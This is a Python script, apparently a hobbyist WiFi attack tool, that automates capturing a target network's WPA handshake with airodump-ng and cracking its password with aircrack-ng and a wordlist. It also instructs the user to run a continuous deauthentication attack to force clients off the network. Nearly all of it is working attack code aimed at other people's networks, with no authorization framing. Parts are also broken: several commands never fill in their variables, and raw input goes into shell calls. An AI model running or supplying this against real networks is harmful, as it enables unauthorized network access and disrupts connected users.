import os
import time
import sys
import signal

class color:
    red = '\33[91m'
    white = '\033[0m'
    underline = '\033[4m'
    warning = '\033[93m'
    green = '\033[92m'
    blue = '\033[94m'

def signal_handler(sig, frame):

    print()
    print("\nCtrl+C pressed, exiting...")

    sys.exit(0)


signal.signal(signal.SIGINT, signal_handler)



os.system('clear')
print(color.warning + "v    vv    v  IIII  888888  IIII")
print(" v  v  v  v    II   88__     II")
print("  vv    vv     II   88**     II")
print("   v    v     IIII  88      IIII ")
print()
print('H     H    db    N  N DDD  .dP"Y8 H     H    db    K  K  888888')
print('H_____H   d  b   NN N D  D `Ydo." H_____H   d  b   K K   88__  ')
print('H     H  d8888b  N NN D  D o.`y8b H     H  d8888b  KKK   88**  ')
print('H     H d      b N  N DDD  8bodP" H     H d      b K  K  888888' + color.white)
print()
print()
print("                       " + color.underline + "(MITM)" + color.white)
print("---*---                                              ")
print("|  *  |                                      ---     ")
print("|  *  | -------------" + color.underline + color.red + "password" + color.white + "--------------- |0|     ")
print("|  0  | -------\                  /--------- |0|     ")
print("-------         \       88       /           ---     ")
print(color.green + "target" + color.white + "           \    8 \/ 8    /          " + color.green + "target" + color.white + "    ")
print(" wifi             \   8    8   /            phone    ")
print("                   \    88    /                      ")
print("                    \ 888888 /                       ")
print("                     " + color.blue + "me/you" + color.white + "                        ")
print()
print()
print("The wifi's are not secure!.")
time.sleep(2)
print()
if not 'SUDO_UID' in os.environ.keys():
    print("please try running this tool with " + color.underline + color.green + "sudo" + color.white + ".")
    exit()

else:
    os.system('clear')
    os.system('iwconfig')
    print()
    interface = input("type or copy your interface(the interface needs to be wifi interface!): ")
    os.system('clear')
    print("turning your wifi into the monitor mode...")
    time.sleep(1)
    os.system(f'sudo airmon-ng start {interface}')
    print()
    print("Done!")
    time.sleep(1)
    os.system('clear')
    print("starting the airodump-ng for scan...")
    print("When you find your target, copy target BSSID!.")
    time.sleep(3)
    os.system(f'sudo airodump-ng {interface}')
    print()
    targetbssid = input("type or copy target mac address to see who connected: ")
    print()
    print("Done!")
    time.sleep(1)
    os.system('clear')
    print(f"starting airodump-ng to see who connected to {targetbssid} ...")
    print("but you need to choose the wifi thats haves some clients.")
    print("if you choose a wifi thats dosen't haves any client,")
    print("you need to stay for the client to connect to the wifi!.")
    time.sleep(4)
    os.system(f'sudo airodump-ng -d {targetbssid}')
    print()
    print('Done!')
    print()
    filename = input('Enter file name for capturing: ')
    channel = input("Enter the channel: ")
    print()
    print('Done!')
    time.sleep(1)
    print('starting airodump-ng for capture the target with these informations... ')
    print(f"filename: {filename}, channel: {channel}, wifi: {targetbssid}.")
    print()
    print("if you run this capture in front of date and time on the terminal you")
    print("see nothing, so that's means handshake is not captured.")
    print("let this capture run and open another terminal and run this command: ")
    print(f"" + color.red + color.underline + "sudo aireplay-ng --deauth 0 {targetbssid} {interface}" + color.white)
    print()
    print("and when the wifi is captured we will see this: ")
    print(f"" + color.blue + "[WPA handshake: {targetbssid}" + color.white)
    time.sleep(10)
    os.system('sudo airodump-ng -w {filename} -c {channel} --bssid {targetbssid}')
    print()
    print()
    print("Done!")
    time.sleep(1)
    os.system('clear')
    os.system('ls')
    print()
    print()
    question = input("Did file was saved ? [y/n]")
    if question == "y":
        print()
        print()
        print("Ok, continuing!...")
        time.sleep(1)
        os.system('clear')
        print("stopping monitor mode...")
        time.sleep(1)
        os.system(f'sudo airmon-ng stop {interface}')
        print()
        print()
        print("Done!")
        time.sleep(1)
        os.system('clear')
        print("starting aircrack-ng to crack the password from captured file...")
        time.sleep(1)
        os.system('clear')
        wordlist = input("Enter path of your wordlist: ")
        print("starting to crack...")
        time.sleep(1)
        os.system('clear')
        os.system(f'sudo aircrack-ng {filename}.cap -w {wordlist}')
        print()
        print()
        input("Done!\nPress Enter to exit")
        exit()

    else:
        print()
        print()
        print("that's bad, capturing again...")
        time.sleep(1)
        print('starting airodump-ng for capture the target with these informations... ')
        print(f"filename: {filename}, channel: {channel}, wifi: {targetbssid}.")
        print()
        print("if you run this capture in front of date and time on the terminal you")
        print("see nothing, so that's means handshake is not captured.")
        print("let this capture run and open another terminal and run this command: ")
        print(f"" + color.red + color.underline + "sudo aireplay-ng --deauth 0 {targetbssid} {interface}" + color.white)
        print()
        print("and when the wifi is captured we will see this: ")
        print(f"" + color.blue + "[WPA handshake: {targetbssid}" + color.white)
        time.sleep(10)
        os.system('sudo airodump-ng -w {filename} -c {channel} --bssid {targetbssid}')
        print()
        print()
        print("Done!")
